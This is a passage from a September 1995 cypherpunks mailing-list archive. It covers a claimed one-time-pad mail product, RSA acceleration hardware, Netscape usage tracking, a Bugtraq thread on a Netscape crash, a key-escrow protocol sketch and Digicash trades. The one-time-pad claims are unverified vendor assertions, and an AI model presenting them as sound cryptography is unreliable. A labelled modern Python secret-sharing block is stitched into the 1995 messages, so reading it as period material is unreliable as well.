it operate with my own eyes, and sat through the conference. It was
a case of serendipity for me, showing up at the booth and getting an
invite to the press conference on the one day I decided to attend 
Networld/Interop. 

 It works something like this: (I may not have it completely right, but
this is what I understood of the broken English of the man without
the microphone)

 A third party generates random numbers, or one of the two communicating
parties. The numbers do not have to be secret. There is also a published
table of mappings..
 Something like, a number, and an operation..

1 -> add 23
2 -> add 21
3 -> add 40
4 -> add 57
90 -> sub 23

 One initial connection is all that is needed to have a secure connection
for the lifetime of the two communicating parties. This initial connection
can be accomplished via any number of ways. It does involve an initial
one time only shared secret. This is much different than the many shared
secrets and key management issues of private and public key systems. 
For the initial connection you can stick the machines back to back if
you are really worried about security. This initial transaction serves
as a seed for subsequent transactions. All subsequent transactions
depend on preceding transactions. A degree of randomness comes from the
randomness of the messages. Each next word in the message is random.  

(the argument goes like this: If you already know what the next word in
the message is, there is no point in sending the message in the first
place, because you know what all the words in the message are.) This
imparts some degree of randomness, as no two beings will have an entire
conversation over their lives the same as their conversation with anybody
else: similar arguments can be applied to file transfers.

 After the initial exchange every message sent subsequently gets randomized
from the previous randomness of the messages plus something in the table.
If somebody else makes an exact copy of your machine, and sends a message
as you, then you can no longer send messages to the other party as you
are out of sync, and an Intruder alert is flagged if you do try to send
a message. Then you and the foreign party can resynchronize. This new state
is the basis for new messages.
 Argument: "That's fine, but how do I communicate securely with someone
over the Internet with email that I'm not able to set up a secure channel
with."
 Apparently each distribution disk is encoded with a unique ID and some
kind of unique (and as yet undisclosed table and algorithm). This table
allows the two parties to somehow setup a secure session and send mail.
This does not solve authentication problems. If somebody steals your
disk and sends mail to someone, they can appear to be you (or anybody).
However, the minute you try to send mail to that same person, there is
state on the remote machine with the imposter that you do not possess
that flags an intruder problem, and new negotiations can begin.
However, snoopers of the original message will still be unable to
decode the one time pad.

 Winn Schwartau and Dr. David Karn have both signed non-disclosure and
both made announcements to the effect that it does work as advertised.
Also, it is not strictly random numbers in the traditional sense. It relies
on the fact that the message is composed of a random series of words to
create the one time pad. However, the one time pad does not repeat itself
due to the continuing diversity of subsequent messages. They have reviewed
the math and the algorithms and stated that it's a completely new way
to think about cryptography, and the math is valid.

 Usability:  point and click.. Click on the little lock button and
the message is encrypted on the fly. The mail browser decrypts the
message on the fly. After it is decrypted it is stored on the hard
drive in plain text. (As it would have to be, unless you encrypt
it with some conventional secret-key algorithm like DES or IDEA).
This is fine as they say you have to have some degree of physical
security anyway, and this is only to protect you on the networks
in between the two machines. I'm inclined to agree.


Notes: 
It's fast!! 
I'm just telling you what I heard.
I have no idea how or what is stored as state information if anything.
(part of the currently undisclosed algorithm).
I was very skeptical at first, but have affected cautious optimism at this
point. (until it is published).

 
I just have a couple things to add. If it's true and works as advertised, we're
in for a real treat, and the NSA and FBI are going to be really upset. :)

Those drug smugglers and kiddie porn pushers are going to be immune
to network wire taps.  Next step: illegal algorithms, illegal XOR. ;)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 28 Sep 95 19:33:21 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto hardware (was: Using sound cards to accelerate RSA?)
Message-ID: <ac90a93404021004b7de@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:49 AM 9/29/95, Douglas Barnes wrote:
>[Tim May writes about why crypto h/w acceleration using DSPs,
>and DSPs in general, are likely doomed niche markets.]
>
>I pretty much agree with Tim, except it's important to realize
>that for a _server_ that is doing a lot of RSA operations, the
>difference between a 3.2 second encryption and a 1.9 second
>encryption is significant. Peak transaction volume for any
>public key-based payment system is going to be a factor of how many
>RSA ops you can do per second.

I don't disagree with Doug about this. But I don't think there are many
"server" systems running a lot of RSA at this point...for most of us, the
amount of RSA (or PGP, IDEA, DES, etc.) computation is a tiny fraction of
the total computons consumed running screen savers.

I'm just not convinced I'll soon invest in a company offering RSA acceleration.

(I recall seeing articles about specialized modular exponentiation hardware
in 1988, and Cylink was offering several such chips. I've yet to see any
commercial boards, for reasonable prices. And I'm willing to bet that no
more than 3 members of our list would buy such a board, even if the hooks
were in place to let PGP, RSAREF, etc. use it. Just a hunch.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Thu, 28 Sep 95 17:57:57 PDT
To: Doug.Hughes@Eng.Auburn.EDU (Doug Hughes)
Subject: Re: worldwide announce: New OTP Mail/FTP apps
In-Reply-To: <199509290031.TAA24720@lab21.eng.auburn.edu>
Message-ID: <199509282349.TAA00187@hoopsnake.cjs.net>
MIME-Version: 1.0
Content-Type: text


> One initial connection is all that is needed to have a secure
> connection for the lifetime of the two communicating parties. This
> initial connection can be accomplished via any number of ways. It
> does involve an initial one time only shared secret. This is much
> different than the many shared secrets and key management issues of
> private and public key systems.  For the initial connection you can
> stick the machines back to back if you are really worried about
> security. This initial transaction serves as a seed for subsequent
> transactions. All subsequent transactions depend on preceding
> transactions. A degree of randomness comes from the randomness of
> the messages. Each next word in the message is random.

I'm a little new to this, but I thought the whole idea behind keys was
not having to whisper "secrets" to someone on the other side of a
crowded mall. Most people don't have the luxury of connecting their
computers back to back with someone on the other side of the world
just to ensure a secure communications path. There would have to be
some mechanisms to ensure that secure delivery of your "secret", and
that brings us back to key management, so the whole thing is rather
self defeating.

Christopher



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Thu, 28 Sep 95 12:37:29 PDT
To: cypherpunks@toad.com
Subject: Anon Http web Proxy V2.1
Message-ID: <9509281922.AA18715@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



I fixed the IOs, it now works a lot faster,
play with it on 
  http://hplyot.obspm.fr:6661/  (no abuse plz)
and get the source package on 
  ftp://hplyot.obspm.fr/tcl/www/tclhttpdsh-0.4beta.tgz


dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

smuggle FSF terrorist $400 million in gold nuclear Serbian Clinton




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: csmyth@blaze.cs.jhu.edu (Chris Smyth)
Date: Thu, 28 Sep 95 17:27:07 PDT
To: cypherpunks@toad.com
Subject: Netscape and privacy
Message-ID: <9509290026.AA08282@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The Communications Week issue of September 25 1995 contains an interesting
interview with Netscape Chairman Jim Clark in which he outlines the future
that he envisions for his company. The interview also contains a passage
discussing the Netscape browser software that I find somewhat disturbing.
Many cypherpunk list members are concerned with the general issue of
electronic privacy and with the programming of WWW browsers, so I think this
post is relevant to the list. Clark's apparent attitude toward privacy makes
me uneasy.

Begin excerpt

Comm Week: How do you track usage?

Clark: We have worked out schemes to tell us when you use our program and
for how long you use it. That capability is easy to add. We can tell each
and every time you turn it on and we can tell whether you have paid for it
or not. We were getting 10 million hits a day at our Web site.  It has
doubled since our IPO.

End excerpt

I personally oppose the collection of this type of behavioral tracking
information without my explicit consent, and I would reconsider using
software which implements the type of tracking Clark mentions above.  Note,
Clark's reply is ambiguous because it does not indicate if the `schemes'
have been implemented or deployed at this time.  Some list member associated
with Netscape may wish to clarify Clark's comments.  

It is true that a user automatically contacts the Netscape Web site when
starting the browser if he or she has not reset the default home page.  I
reset my home page long ago, but I do not know if the Netscape site is still
contacted anyway.  Nor do I know if Netscape is contacted when I quit the
browser, or if elapsed usage time is tracked.

The future Clark posits for his corporation depends on people adopting
Netscape software for a wide variety of tasks. He wants the browser to
evolve toward being a general multimedia web browser, mail handler,
newsreader, and collaboration tool.  Such a tool would handle large amounts
of private and/or proprietary information and the creator of such a tool
must be extremely sensitive to privacy concerns in my opinion.  Collecting
and relaying information about usage is potentially a significant violation
of the privacy users will expect.

Certainly, it is tempting to gather information for marketing purposes and
other reasons.  For example, some browser company unconcerned about privacy
might program its browser to regularly transmit information about bookmarks
and histories to a database site for analysis and data-mining.  But ignoring
privacy concerns risks invoking the fervent ill-will of many users.  Perhaps
I am over-reacting to Clark's comments.  Even if I am over-reacting,
Netscape should consider developing a statement of its privacy policy and
making it available at its web site.

It is not easy to craft clear, concise and general privacy guidelines.
Below are two crudely crafted suggestions for properties that should be
satisfied by a browser.

1) Information about browser usage will never be collected and/or transmitted
surreptitiously to any other agent on the net.

2) Transfer of information should be done openly with the explicit
initiation/agreement of the browser user.

Note, currently the Netscape browser (and other browsers) apparently transmit
identification information such as the browser type, version number, and
machine name when making a connection.  The browser user should probably be
told about this information in my opinion.
                Chris Smyth csmyth@blaze.cs.jhu.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Thu, 28 Sep 95 13:17:48 PDT
To: cypherpunks@toad.com
Subject: RE: "Notes" to be Eclipsed by "Netscape"
In-Reply-To: <01BA8CD0.30988CA0@ploshin.tiac.net>
Message-ID: <Pine.HPP.3.91.950928205053.16699C-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Pete Loshin wrote:

> >Timothy C. May wrote:

> >(I've been saying for a while that the Web serves that purpose better, and
> >that Web browsers will likely edge out Notes. Apparently I was hardly
> >prescient, as Netscape recently bought Collabra, which is pushing that
> >point exactly.)
> 
> Notes uses replication to distribute data across networks;
> there are better ways to have people compute remotely in my opinion
> too (not sure WWW is THE answer, but it certainly is one of them).

In an interview today in a Stockholm paper with a technical
spokesperson for Hewlett-Packard (about the HP internal net with 19
worldwide connections to the Internet - by the way, allegedly
no one has ever succeeded in breaking their firewalls) it was
stated that Netscape was heavily used for HP internal business.
Apparently there was a choice between Notes and the internal
Web, the Web being favoured 470:1.

Mats





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Thu, 28 Sep 95 19:40:22 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: GSSAPI compliant Apps
Message-ID: <Pine.A32.3.91.950928205746.26830B-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm interested in writing a GSSAPI compliant app, but I have been so far 
unsuccessful in finding an example of GSSAPI compliant code to use as a 
baseline.

Does anyone have any pointers?

Thanks
Ben.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMGtcgL5ALmeTVXAJAQElIQL+JzyPIvta+NRiU6id45o557kvaxGvti4A
cREqsyn1oJPXS44GW9/RzdzJMjN7ofnMKqNt/TbKGgMni+XYCc/OAxLauDoKl8vm
4v/tTtfgVWGoS1jEB03SAB7Z2U49HxWv
=35YV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Thu, 28 Sep 95 15:58:07 PDT
To: cypherpunks@toad.com
Subject: Re: Netscpae & Fortezza (Or, say it Ain't so, Jeff?)
In-Reply-To: <199509281309.JAA12017@bwh.harvard.edu>
Message-ID: <44f98a$mu5@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509281309.JAA12017@bwh.harvard.edu>, adam@bwh.harvard.edu (Adam Shostack) writes:
> This came across the SSL mailing list.  Anyone know Taher's position
> on key-escrow?

  Just because we may do fortezza support for customers who want it
does not mean that we will force key escrow on the rest of the world.
I for one am against any kind of GAK on moral grounds.  I also think
that trying to implement mandatory GAK in a software only system
would be a nightmare.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 28 Sep 95 23:04:10 PDT
To: cypherpunks@toad.com
Subject: Re: Ray Cromwell: Another Netscape Bug (and possible security (fwd)
Message-ID: <199509290559.WAA24563@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
From owner-bugtraq@crimelab.com  Thu Sep 28 19:58:59 1995
Approved-By: CHASIN@CRIMELAB.COM
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Approved-By:  Neil Woods <neil@LEGLESS.DEMON.CO.UK>
Message-ID:  <199509280324.EAA19959@legless.demon.co.uk>
Date:         Thu, 28 Sep 1995 04:24:06 +0100
Reply-To: Bugtraq List <BUGTRAQ@crimelab.com>
Sender: Bugtraq List <BUGTRAQ@crimelab.com>
From: Neil Woods <neil@legless.demon.co.uk>
Subject:      Re: Ray Cromwell: Another Netscape Bug (and possible security
X-To:         BUGTRAQ@CRIMELAB.COM
X-cc:         8lgm@bagpuss.demon.co.uk
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@crimelab.com>
In-Reply-To:  <199509260045.OAA12377@hookomo.aloha.net> from "Timothy Newsham"
              at Sep 25, 95 02:45:26 pm

>
> > >On my BSDI2.0 machine running Netscape 1.1N, this causes a segmentation
> > >fault and subsequent coredump. GDB reports nothing useable (stripped
> > >executable)
> >
> >   I cannot reproduce this bug on the following platforms:
> >
> >         Solaris 2.5 beta/Netscape 1.1N
>
> I've reproduced it fine under sol2.4 1.1N.  The page
> I tested from is http://www.aloha.net/~newsham/test.html.
> Simply click on the long test url and core dump.
> (You can view source before clicking to see what you
> are clicking on if you don't trust me :)
>
> > Howard Owen hbo@octel.com   Octel Communications Corporation  1024/DC671C31 =
>

I've tried this URL, it does indeed core dump.

Just had a quick look at the core.  From first impressions, it's a global
overwrite.  Therefore we're not overwriting a flushed stack frame, so a
syslog(3) style exploit is impossible.

Global overwrites can be exploited, but due to the scenario we're looking
at, I'd consider exploit chances to be very low indeed.

Cheers,

Neil
--
Let the Mystery Be, So Watcha Want, Longing In Their Hearts, Hate My Way,
M-Bike, Safari, Uncle June and Aunt Kiyoti, Daisy Dead Petals, Tuff Gnarl.

     ...like a badger with an afro throwing sparklers at the Pope...


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 28 Sep 95 20:06:05 PDT
To: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Subject: Re: GSSAPI compliant Apps
In-Reply-To: <Pine.A32.3.91.950928205746.26830B-100000@FROG.ZOO2.CS.YALE.EDU>
Message-ID: <199509290305.XAA25007@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Grab the Kerberos V distribution from MIT; it has a GSSAPI implementation
and a sample client/server that use it.  I believe you can find it on:
	ftp://athena-dist.mit.edu/pub/ATHENA/kerberos

-derek

> I'm interested in writing a GSSAPI compliant app, but I have been so far 
> unsuccessful in finding an example of GSSAPI compliant code to use as a 
> baseline.
> 
> Does anyone have any pointers?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frederic Miserey" <frederic@none.net>
Date: Thu, 28 Sep 95 15:41:47 PDT
To: cypherpunks@toad.com
Subject: Re: 25 Crays a Year to Break STT
Message-ID: <9509282340.AA44771@margote.none.net>
MIME-Version: 1.0
Content-Type: text/plain

> to encourage widespread adoption of STT, Microsoft and Visa are making 
> its technical specifications available at no charge to third parties 
> to allow them to develop software. 
>
I can't find any info on www.microsoft.com. Any hint on how to get these 
specs?

Frederic


---------------------------------------------------------------------------
Frederic Miserey                                   mailto:frederic@none.com
none programs                                         finger me for PGP key
                           42 3A 75 40 71 E6 DC 3B  50 90 F9 6B 26 28 60 91
 "The last bug isn't fixed until the last user is dead" - Sidney Markowitz


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 28 Sep 95 20:54:50 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Crypto hardware (was: Using sound cards to accelerate RSA?)
In-Reply-To: <ac90a93404021004b7de@[205.199.118.202]>
Message-ID: <199509290354.XAA21646@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> At 1:49 AM 9/29/95, Douglas Barnes wrote:
> >[Tim May writes about why crypto h/w acceleration using DSPs,
> >and DSPs in general, are likely doomed niche markets.]
> >
> >I pretty much agree with Tim, except it's important to realize
> >that for a _server_ that is doing a lot of RSA operations, the
> >difference between a 3.2 second encryption and a 1.9 second
> >encryption is significant.
> 
> I don't disagree with Doug about this. But I don't think there are many
> "server" systems running a lot of RSA at this point.
[...]
> for most of us, the
> amount of RSA (or PGP, IDEA, DES, etc.) computation is a tiny fraction of
> the total computons consumed running screen savers.

And if problems like this don't get solved, how do you expect digital
online banking to be done? Psychic quantum transfers between the
machines? What do you think a bank in the future is, if not a server
that has to do lots and lots of RSA or D-H or what have you?

Sorry for being nasty, Tim. It's just that some of us live in the real
world, have real clients, and actually worry about this as a
problem. This *is* a legitimate problem. Consider what the load on a
web site using D-H key exchange for every connection gets like when
you have millions of people hitting it every day.

> (I recall seeing articles about specialized modular exponentiation hardware
> in 1988, and Cylink was offering several such chips. I've yet to see any
> commercial boards, for reasonable prices. And I'm willing to bet that no
> more than 3 members of our list would buy such a board, even if the hooks
> were in place to let PGP, RSAREF, etc. use it. Just a hunch.)

You obviously haven't heard of Fortezza cards. Yup, they are key
escrowed -- but they do in fact do public key operations on
board. There are a lot of them floating around.

The reason the market for this is weird is the same reason Sun took
the DES chips off its motherboards years ago -- you can't conduct
modern business with the fucked up export regime we are dealing with.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 28 Sep 95 23:59:51 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Re: SAIC bought InterNic, but who is SAIC?  A spook contractor!
Message-ID: <199509290659.XAA09160@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>SAIC's board members include Admiral Bobby Inman, former NSA head and deputy
>director of the CIA; Melvin Laird, Nixon's defense secretary; and retired
>General Max Thurman, commander of the Panama Invasion. Recently departed
>board members include Robert Gates, former CIA director; William Perry,
>current Secretary of Defense; and John Deutch, the current CIA director.
...
>"At the very time the Internet community is struggling with the issues of
>encryption and privacy, I'm more than a little uneasy to find this bunch of
>ex-spooks sitting at the very entry point of the Net," says Jim Warren (a

Yeah, that _is_ a pretty spooky bunch; I don't know if anybody'd have standing
to do a conflict-of-interest or governmental ethics case of any sort,
since it is more or less a monopoly?  
[BEGIN NOISE]
On the other hand, I suppose I'd
rather have the CIA making money by selling directory services than,
say, dealing cocaine or collecting graft from third-world governments :-)
[END NOISE]

>Current SAIC government contracts include re-engineering information systems
>at the Pentagon, automation of the FBI's computerized fingerprint
>identification system, and building a national criminal history information
>system.

SAIC's a fairly generalized contracting firm, specializing in study contracts
and other front-end work rather than back-end implementation grunt-work;
I'm not surprised by the list.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 29 Sep 95 00:00:30 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscpae & Fortezza (Or, say it Ain't so, Jeff?)
Message-ID: <199509290659.XAA09185@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>I for one am against any kind of GAK on moral grounds.  I also think
>that trying to implement mandatory GAK in a software only system
>would be a nightmare.

Unfortunately, it's quite simple, if your only intent is to get the keys,
and not to use it as a way to increase NSA leverage...
Carl Ellison's web page points out the simple version of this,
and it's easy to extend to make it more reliable.
1) Have the NSA/NIST/DEA/etc. generate public keys for their GAK agents.
2) Have each session-key-transfer encrypt a copy of the session key with
the public key of the GAK agent, and send it at the beginning of the connection.
3) To make it more robust, have the recipient of the session key also 
encrypt the session key with the GAK key and send it back,
so that a conformist receiver can rat the key even if the sender didn't.
(takes a little protocol support to make sure the sender doesn't mind
getting it echoed back to her.)

Unlike Steven Walker's fancy complex method (which Dorothy liked a lot),
this is simple and straightforward, and requires no validation by
the recipient.  (Both parties could send fakes, but they could
do that anyway.)  What it doesn't do is allow third parties to detect
whether the GAK field has the real session key in it or a fake,
but c'est la guerre.  You can even get fancier and support M-of-N splitting,
requiring M of N GAK agents to give out their keyparts; just do the
split and encrypt each piece with the corresponding GAK agent's public key.
This also works in a wide variety of environments (e.g. Diffie-Hellman).
You could also scrounge a few bits by using the GAK field as an IV if you 
need one.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
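
The M-of-N variant described in the message above, as an added example that is not part of Bill Stewart's post: it assumes Shamir secret sharing over a prime field as the split, which the message does not name, and leaves out the final step of encrypting each share under the corresponding agent's public key. The function names and the sample session key are constructed for illustration.

```python
"""M-of-N split of a session key (Shamir secret sharing over GF(p))."""
import secrets

# 2**521 - 1 is a Mersenne prime, far larger than a 128- or 256-bit session key.
PRIME = 2**521 - 1


def split_secret(secret, m, n, prime=PRIME):
    """Return n shares (x, y); any m of them reconstruct `secret`."""
    if not 1 <= m <= n < prime:
        raise ValueError("need 1 <= m <= n")
    if not 0 <= secret < prime:
        raise ValueError("secret must be in [0, prime)")
    # Random polynomial of degree m-1 whose constant term is the secret.
    coeffs = [secret] + [secrets.randbelow(prime) for _ in range(m - 1)]
    shares = []
    for x in range(1, n + 1):
        y = 0
        for c in reversed(coeffs):      # Horner evaluation of f(x) mod p
            y = (y * x + c) % prime
        shares.append((x, y))
    return shares


def interpolate_at(points, x, prime=PRIME):
    """Evaluate at `x` the unique polynomial through `points` (Lagrange)."""
    xs = [px for px, _ in points]
    if len(set(xs)) != len(xs):
        raise ValueError("share indices must be distinct")
    total = 0
    for i, (xi, yi) in enumerate(points):
        num, den = 1, 1
        for j, (xj, _) in enumerate(points):
            if i != j:
                num = num * (x - xj) % prime
                den = den * (xi - xj) % prime
        total = (total + yi * num * pow(den, -1, prime)) % prime
    return total


def recover_secret(shares, prime=PRIME):
    """Reconstruct f(0) from at least m shares."""
    return interpolate_at(shares, 0, prime)


def share_matching_guess(partial_shares, guess, x_new, prime=PRIME):
    """Given m-1 real shares and ANY guessed secret, compute the m-th share
    that would make the guess reconstruct. One exists for every guess, which
    is why m-1 colluding holders learn nothing about the real secret."""
    points = [(0, guess)] + list(partial_shares)
    return (x_new, interpolate_at(points, x_new, prime))


if __name__ == "__main__":
    session_key = 0x00112233445566778899AABBCCDDEEFF  # constructed sample value
    shares = split_secret(session_key, m=3, n=5)
    print("any 3 of 5 recover:", recover_secret(shares[1:4]) == session_key)
    print("2 of 5 recover:    ", recover_secret(shares[:2]) == session_key)
    wrong = 0xDEADBEEF
    forged = share_matching_guess(shares[:2], wrong, x_new=3)
    print("2 real shares fit a wrong key:",
          recover_secret(shares[:2] + [forged]) == wrong)
```

The last check is the threshold property in concrete form: two real shares are consistent with every possible key, so only M cooperating holders can recover the real one.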





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan B. Clegg" <abc@gateway.com>
Date: Thu, 28 Sep 95 20:58:54 PDT
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: awards for hacking microsoft
In-Reply-To: <9509282225.AA04018@ch1d157nwk>
Message-ID: <Pine.LNX.3.91.950928233148.1019A-100000@black-ice.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Sep 1995, Andrew Loewenstern wrote:

> >  What else, Chaum's Digicash.  If you are unwilling to part with
> >  any of your own, perhaps you can collect contributions, or maybe
> >  the Digicash people will pony-up some extra cyberbucks for a good
> >  cause.  After all, they are worth the paper they're printed on.
> >  :-)
> 
> Don't tell that to the people on the ECM mailing list!  People there have  
> been trading cyberbucks for RealMoney.  The last successful trade I saw was  
> 100 cyberbucks for 4 UK pounds...

And to add to the exchange, I'm offering a US$50 [real] discount for any
client of Gateway Communications that deposits $5 [cyber] via my web page. 

The reduction hurts me very little, and the exchange of cyberbucks is fun. 
Isn't that why we do this stuff anyway? 

-abc

      It's time to stand and cry             |  Alan B Clegg
       That Freedom will not live             |  President
         Beyond our willingness to die         |  Gateway Communications
          -Lester Bork                          |  http://www.gateway.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Thu, 28 Sep 95 22:02:32 PDT
To: cypherpunks@toad.com
Subject: 53 of the FAX No's. are GOOD!
Message-ID: <199509290502.WAA29977@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

53 of the Fax numbers were good.

About 15 were no good, and the
rest turned in no answers.

I will update this URL tomorrow,
when I can completely check the list;

http://www.c2.org/~carolann/enda001.html

is where the list is at on the WWW.

Love Always,

Carol Anne
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGt9S4rpjEWs1wBlAQE5iQP/e74RL+Rmui47LgWT9hk4LNlfISGkHYS2
fdVsut/mbLF/FrRIeETecaSJOOxOBXBr84OYzRLicka+Lm01ciW32pbXYvILftLS
vNs7ppWoIs+C343cd3TOZx0p2Q8QuSZSUSGSYCEk1dwZTl/rd1iHTU3DW2ALZ66P
xOTLPUV8p1Y=
=dJpK
-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 29 Sep 95 00:27:10 PDT
To: nelson@santafe.edu (Nelson Minar)
Subject: Re: your mail
In-Reply-To: <9509290711.AA07934@sfi.santafe.edu>
Message-ID: <199509290722.AAA01028@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	As if the ITAR would allow something like that to be exported?
As if Microsoft would actually produce a product which the ITAR
wouldn't allow to be exported?
	Sounds like PR bullshit. Compared to this Netscape's PR looks
-good-.

	Stay tuned for Hack Microsoft. Community ConneXion gets into
the T-shirt biz. ;-)

> 
> >>Although no encryption system was totally secure, Mr Dent estimated
> >>it would take "25 Cray supercomputers a year" to break the STT codes.
> >Is it just me, or does someone need to be humbled?
> 
> They're certainly calling out for some external evaluation.
> 
> Has anyone read the specs? Care to summarize? I'm curious if the "25
> crays one year" comment is intended to mean anything, or if it's just
> some foolish PR person who doesn't understand what he's talking about.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 29 Sep 95 01:07:40 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Fax Service
Message-ID: <199509290802.BAA03251@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


I see a potential business opportunity for enterprising cypherpunks:

	People have been posting things saying "we should have press
releases". People have been posting useful information regarding fax
numbers of reporters around the country and such. In this I see a
potential low-maintenance business opportunity for some enterprising
cypherpunk with a high-grade fax machine.

	There is no way anyone can make a 'Cypherpunk press release'
because there is no "Cypherpunk Organization". There -are- however,
cypherpunks organizations. Community ConneXion is one, for example,
and others such as COMSEC partners may be considered cypherpunk
organizations.
	Some enterprising cypherpunk may wish to sell the services of
their fax machine so that cypherpunk organizations don't need to
invest the time towards building up a good database of press fax
numbers. For some fee a cypherpunk organization would send only to the
service a press release, and the service would make sure it reaches
all the people in the press who find cypherpunk topics interesting.

	Hell, if no one sets this up before I get my own mass-faxer
setup, I might just do it myself.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@santafe.edu (Nelson Minar)
Date: Fri, 29 Sep 95 00:13:24 PDT
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <199509290439.FAA26254@utopia.hacktic.nl>
Message-ID: <9509290711.AA07934@sfi.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


>>Although no encryption system was totally secure, Mr Dent estimated
>>it would take "25 Cray supercomputers a year" to break the STT codes.
>Is it just me, or does someone need to be humbled?

They're certainly calling out for some external evaluation.

Has anyone read the specs? Care to summarize? I'm curious if the "25
